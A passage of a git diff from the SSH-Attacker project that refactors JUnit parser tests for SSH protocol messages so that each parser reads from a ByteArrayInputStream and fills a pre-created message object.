de.rub.nds.sshattacker.core.protocol.connection.message.ChannelExtendedDataMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -61,8 +62,9 @@ public void testParse( ExtendedChannelDataType expectedDataType, byte[] expectedPayload) { ChannelExtendedDataMessageParser parser = - new ChannelExtendedDataMessageParser(providedBytes); - ChannelExtendedDataMessage msg = parser.parse(); + new ChannelExtendedDataMessageParser(new ByteArrayInputStream(providedBytes)); + ChannelExtendedDataMessage msg = new ChannelExtendedDataMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_CHANNEL_EXTENDED_DATA.getId(), diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParserTest.java index be32962df..d7ede73b8 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelFailureMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -38,8 +39,10 @@ public static Stream provideTestVectors() { @ParameterizedTest @MethodSource("provideTestVectors") public void testParse(byte[] providedBytes, int expectedRecipientChannel) { - ChannelFailureMessageParser parser = new ChannelFailureMessageParser(providedBytes); - ChannelFailureMessage msg = parser.parse(); + ChannelFailureMessageParser parser = + new ChannelFailureMessageParser(new ByteArrayInputStream(providedBytes)); + ChannelFailureMessage msg = new ChannelFailureMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_CHANNEL_FAILURE.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParserTest.java index a7e863298..5ed5c89a1 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenConfirmationMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -63,8 +64,9 @@ public void testParse( int expectedInitialWindowSize, int expectedMaximumPacketSize) { ChannelOpenConfirmationMessageParser parser = - new ChannelOpenConfirmationMessageParser(providedBytes); - ChannelOpenConfirmationMessage msg = parser.parse(); + new ChannelOpenConfirmationMessageParser(new ByteArrayInputStream(providedBytes)); + ChannelOpenConfirmationMessage msg = new ChannelOpenConfirmationMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_CHANNEL_OPEN_CONFIRMATION.getId(), diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParserTest.java index ec114ad6d..be8b33595 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenFailureMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -58,8 +59,10 @@ public void testParse( int expectedReasonCode, String expectedReason, String expectedLanguageTag) { - ChannelOpenFailureMessageParser parser = new ChannelOpenFailureMessageParser(providedBytes); - ChannelOpenFailureMessage msg = parser.parse(); + ChannelOpenFailureMessageParser parser = + new ChannelOpenFailureMessageParser(new ByteArrayInputStream(providedBytes)); + ChannelOpenFailureMessage msg = new ChannelOpenFailureMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_CHANNEL_OPEN_FAILURE.getId(), diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParserTest.java index 3ce989ff2..a43dc1897 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.sshattacker.core.constants.ChannelType; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenSessionMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -66,8 +67,10 @@ public void testParse( int expectedSenderChannel, int expectedInitialWindowSize, int expectedMaximumPacketSize) { - ChannelOpenSessionMessageParser parser = new ChannelOpenSessionMessageParser(providedBytes); - ChannelOpenSessionMessage msg = parser.parse(); + ChannelOpenSessionMessageParser parser = + new ChannelOpenSessionMessageParser(new ByteArrayInputStream(providedBytes)); + ChannelOpenSessionMessage msg = new ChannelOpenSessionMessage(); + parser.parse(msg); assertEquals(MessageIdConstant.SSH_MSG_CHANNEL_OPEN.getId(), msg.getMessageId().getValue()); assertEquals(expectedChannelType.toString(), msg.getChannelType().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParserTest.java index d6915b1dd..4b988fe7b 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelSuccessMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -38,8 +39,10 @@ public static Stream provideTestVectors() { @ParameterizedTest @MethodSource("provideTestVectors") public void testParse(byte[] providedBytes, int expectedRecipientChannel) { - ChannelSuccessMessageParser parser = new ChannelSuccessMessageParser(providedBytes); - ChannelSuccessMessage msg = parser.parse(); + ChannelSuccessMessageParser parser = + new ChannelSuccessMessageParser(new ByteArrayInputStream(providedBytes)); + ChannelSuccessMessage msg = new ChannelSuccessMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_CHANNEL_SUCCESS.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParserTest.java index dffb633a5..25e4aad32 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelWindowAdjustMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -45,8 +46,9 @@ public static Stream provideTestVectors() { public void testParse( byte[] providedBytes, int expectedRecipientChannel, int expectedBytesToAdd) { ChannelWindowAdjustMessageParser parser = - new ChannelWindowAdjustMessageParser(providedBytes, 0); - ChannelWindowAdjustMessage msg = parser.parse(); + new ChannelWindowAdjustMessageParser(new ByteArrayInputStream(providedBytes)); + ChannelWindowAdjustMessage msg = new ChannelWindowAdjustMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_CHANNEL_WINDOW_ADJUST.getId(), diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParserTest.java index 29b4c86f5..fae58c14f 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParserTest.java @@ -10,15 +10,20 @@ import static org.junit.jupiter.api.Assertions.assertEquals; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; +import de.rub.nds.sshattacker.core.layer.data.Parser; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestFailureMessage; +import java.io.ByteArrayInputStream; import org.junit.jupiter.api.Test; public class GlobalRequestFailureMessageParserTest { /** Test of RequestFailureMessageParser::parse method */ @Test public void testParse() { - GlobalRequestFailureMessage msg = - new GlobalRequestFailureMessageParser(new byte[] {82}).parse(); + GlobalRequestFailureMessage msg = new GlobalRequestFailureMessage(); + Parser parser = + new GlobalRequestFailureMessageParser(new ByteArrayInputStream(new byte[] {82})); + parser.parse(msg); + assertEquals( MessageIdConstant.SSH_MSG_REQUEST_FAILURE.getId(), msg.getMessageId().getValue()); } diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParserTest.java index 8d70a802d..f677d3700 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestSuccessMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -36,8 +37,9 @@ public static Stream provideTestVectors() { @MethodSource("provideTestVectors") public void testParse(byte[] providedBytes) { GlobalRequestSuccessMessageParser parser = - new GlobalRequestSuccessMessageParser(providedBytes); - GlobalRequestSuccessMessage msg = parser.parse(); + new GlobalRequestSuccessMessageParser(new ByteArrayInputStream(providedBytes)); + GlobalRequestSuccessMessage msg = new GlobalRequestSuccessMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_REQUEST_SUCCESS.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParserTest.java index 88c7c8305..af92a0db6 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.transport.message.DebugMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -57,8 +58,9 @@ public void testParse( byte expectedAlwaysDisplay, String expectedMessage, String expectedLanguageTag) { - DebugMessageParser parser = new DebugMessageParser(providedBytes); - DebugMessage msg = parser.parse(); + DebugMessageParser parser = new DebugMessageParser(new ByteArrayInputStream(providedBytes)); + DebugMessage msg = new DebugMessage(); + parser.parse(msg); assertEquals(MessageIdConstant.SSH_MSG_DEBUG.getId(), msg.getMessageId().getValue()); assertEquals(expectedAlwaysDisplay, msg.getAlwaysDisplay().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParserTest.java index 11c7bde68..7f396f75d 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.NamedDhGroup; import de.rub.nds.sshattacker.core.protocol.transport.message.DhGexKeyExchangeGroupMessage; +import java.io.ByteArrayInputStream; import java.math.BigInteger; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; @@ -58,8 +59,9 @@ public void testParse( BigInteger expectedGroupModulus, BigInteger expectedGroupGenerator) { DhGexKeyExchangeGroupMessageParser parser = - new DhGexKeyExchangeGroupMessageParser(providedBytes); - DhGexKeyExchangeGroupMessage msg = parser.parse(); + new DhGexKeyExchangeGroupMessageParser(new ByteArrayInputStream(providedBytes)); + DhGexKeyExchangeGroupMessage msg = new DhGexKeyExchangeGroupMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_KEX_DH_GEX_GROUP.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParserTest.java index 58aa7b5e4..142f54236 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.transport.message.DhGexKeyExchangeReplyMessage; +import java.io.ByteArrayInputStream; import java.math.BigInteger; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; @@ -67,8 +68,9 @@ public void testParse( int expectedSignatureLength, byte[] expectedSignature) { DhGexKeyExchangeReplyMessageParser parser = - new DhGexKeyExchangeReplyMessageParser(providedBytes); - DhGexKeyExchangeReplyMessage msg = parser.parse(); + new DhGexKeyExchangeReplyMessageParser(new ByteArrayInputStream(providedBytes)); + DhGexKeyExchangeReplyMessage msg = new DhGexKeyExchangeReplyMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_KEX_DH_GEX_REPLY.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeReplyMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeReplyMessageParserTest.java index 2d5f4b566..403fdd668 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeReplyMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeReplyMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.transport.message.DhKeyExchangeReplyMessage; +import java.io.ByteArrayInputStream; import java.math.BigInteger; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; @@ -66,8 +67,10 @@ public void testParse( BigInteger expectedEphemeralPublicKey, int expectedSignatureLength, byte[] expectedSignature) { - DhKeyExchangeReplyMessageParser parser = new DhKeyExchangeReplyMessageParser(providedBytes); - DhKeyExchangeReplyMessage msg = parser.parse(); + DhKeyExchangeReplyMessageParser parser = + new DhKeyExchangeReplyMessageParser(new ByteArrayInputStream(providedBytes)); + DhKeyExchangeReplyMessage msg = new DhKeyExchangeReplyMessage(); + parser.parse(msg); assertEquals(MessageIdConstant.SSH_MSG_KEXDH_REPLY.getId(), msg.getMessageId().getValue()); assertEquals(expectedHostKeyBytesLength, msg.getHostKeyBytesLength().getValue().intValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DisconnectMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DisconnectMessageParserTest.java index 32a0a6862..43a51819c 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DisconnectMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DisconnectMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.sshattacker.core.constants.DisconnectReason; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.transport.message.DisconnectMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -61,8 +62,10 @@ public void testParse( DisconnectReason expectedDisconnectReason, String expectedDescription, String expectedLanguageTag) { - DisconnectMessageParser parser = new DisconnectMessageParser(providedBytes); - DisconnectMessage msg = parser.parse(); + DisconnectMessageParser parser = + new DisconnectMessageParser(new ByteArrayInputStream(providedBytes)); + DisconnectMessage msg = new DisconnectMessage(); + parser.parse(msg); assertEquals(MessageIdConstant.SSH_MSG_DISCONNECT.getId(), msg.getMessageId().getValue()); assertEquals(expectedDisconnectReason.getId(), msg.getReasonCode().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParserTest.java index 6833547d0..bceb7a2ac 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.transport.message.EcdhKeyExchangeInitMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -48,8 +49,9 @@ public void testParse( int expectedEphemeralPublicKeyLength, byte[] expectedEphemeralPublicKey) { EcdhKeyExchangeInitMessageParser parser = - new EcdhKeyExchangeInitMessageParser(providedBytes); - EcdhKeyExchangeInitMessage msg = parser.parse(); + new EcdhKeyExchangeInitMessageParser(new ByteArrayInputStream(providedBytes)); + EcdhKeyExchangeInitMessage msg = new EcdhKeyExchangeInitMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_KEX_ECDH_INIT.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeReplyMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeReplyMessageParserTest.java index 9fe4e954c..7ac0c7959 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeReplyMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeReplyMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.transport.message.EcdhKeyExchangeReplyMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -62,8 +63,9 @@ public void testParse( int expectedSignatureLength, byte[] expectedSignature) { EcdhKeyExchangeReplyMessageParser parser = - new EcdhKeyExchangeReplyMessageParser(providedBytes); - EcdhKeyExchangeReplyMessage msg = parser.parse(); + new EcdhKeyExchangeReplyMessageParser(new ByteArrayInputStream(providedBytes)); + EcdhKeyExchangeReplyMessage msg = new EcdhKeyExchangeReplyMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_KEX_ECDH_REPLY.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/IgnoreMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/IgnoreMessageParserTest.java index 63d64e0b8..8c2b1a6fc 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/IgnoreMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/IgnoreMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.transport.message.IgnoreMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -43,8 +44,10 @@ public static Stream provideTestVectors() { @ParameterizedTest @MethodSource("provideTestVectors") public void testParse(byte[] providedBytes, byte[] expectedData) { - IgnoreMessageParser parser = new IgnoreMessageParser(providedBytes); - IgnoreMessage msg = parser.parse(); + IgnoreMessageParser parser = + new IgnoreMessageParser(new ByteArrayInputStream(providedBytes)); + IgnoreMessage msg = new IgnoreMessage(); + parser.parse(msg); assertEquals(MessageIdConstant.SSH_MSG_IGNORE.getId(), msg.getMessageId().getValue()); assertArrayEquals(expectedData, msg.getData().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParserTest.java index 03590acf8..e57a3d18a 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.protocol.transport.message.KeyExchangeInitMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -143,8 +144,10 @@ public void testParse( String expectedLanguagesSToC, byte expectedFirstKeyExchangePacketFollows, int expectedReserved) { - KeyExchangeInitMessageParser parser = new KeyExchangeInitMessageParser(providedBytes); - KeyExchangeInitMessage msg = parser.parse(); + KeyExchangeInitMessageParser parser = + new KeyExchangeInitMessageParser(new ByteArrayInputStream(providedBytes)); + KeyExchangeInitMessage msg = new KeyExchangeInitMessage(); + parser.parse(msg); assertArrayEquals(expectedCookie, msg.getCookie().getValue()); assertEquals( diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParserTest.java index e9c489e0c..8703b799e 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParserTest.java @@ -10,14 +10,18 @@ import static org.junit.jupiter.api.Assertions.assertEquals; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; +import de.rub.nds.sshattacker.core.layer.data.Parser; import de.rub.nds.sshattacker.core.protocol.transport.message.NewKeysMessage; +import java.io.ByteArrayInputStream; import org.junit.jupiter.api.Test; public class NewKeysMessageParserTest { /** Test of NewKeysMessageParser::parse method */ @Test public void testParse() { - NewKeysMessage msg = new NewKeysMessageParser(new byte[] {21}).parse(); + NewKeysMessage msg = new NewKeysMessage(); + Parser parser = new NewKeysMessageParser(new ByteArrayInputStream(new byte[] {21})); + parser.parse(msg); assertEquals(MessageIdConstant.SSH_MSG_NEWKEYS.getId(), msg.getMessageId().getValue()); } } diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParserTest.java index 968ff0452..94a38a460 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.transport.message.RsaKeyExchangeDoneMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -45,8 +46,10 @@ public static Stream provideTestVectors() { @MethodSource("provideTestVectors") public void testParse( byte[] providedBytes, int expectedSignatureLength, byte[] expectedSignature) { - RsaKeyExchangeDoneMessageParser parser = new RsaKeyExchangeDoneMessageParser(providedBytes); - RsaKeyExchangeDoneMessage msg = parser.parse(); + RsaKeyExchangeDoneMessageParser parser = + new RsaKeyExchangeDoneMessageParser(new ByteArrayInputStream(providedBytes)); + RsaKeyExchangeDoneMessage msg = new RsaKeyExchangeDoneMessage(); + parser.parse(msg); assertEquals(MessageIdConstant.SSH_MSG_KEXRSA_DONE.getId(), msg.getMessageId().getValue()); assertEquals(expectedSignatureLength, msg.getSignatureLength().getValue().intValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangePubkeyMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangePubkeyMessageParserTest.java index 9ec6d31ea..62451feb6 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangePubkeyMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangePubkeyMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.transport.message.RsaKeyExchangePubkeyMessage; +import java.io.ByteArrayInputStream; import java.math.BigInteger; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; @@ -63,8 +64,9 @@ public void testParse( BigInteger exponent, BigInteger modulus) { RsaKeyExchangePubkeyMessageParser parser = - new RsaKeyExchangePubkeyMessageParser(providedBytes); - RsaKeyExchangePubkeyMessage msg = parser.parse(); + new RsaKeyExchangePubkeyMessageParser(new ByteArrayInputStream(providedBytes)); + RsaKeyExchangePubkeyMessage msg = new RsaKeyExchangePubkeyMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_KEXRSA_PUBKEY.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParserTest.java index 6d598d79f..c2ab63f0e 100644 --- 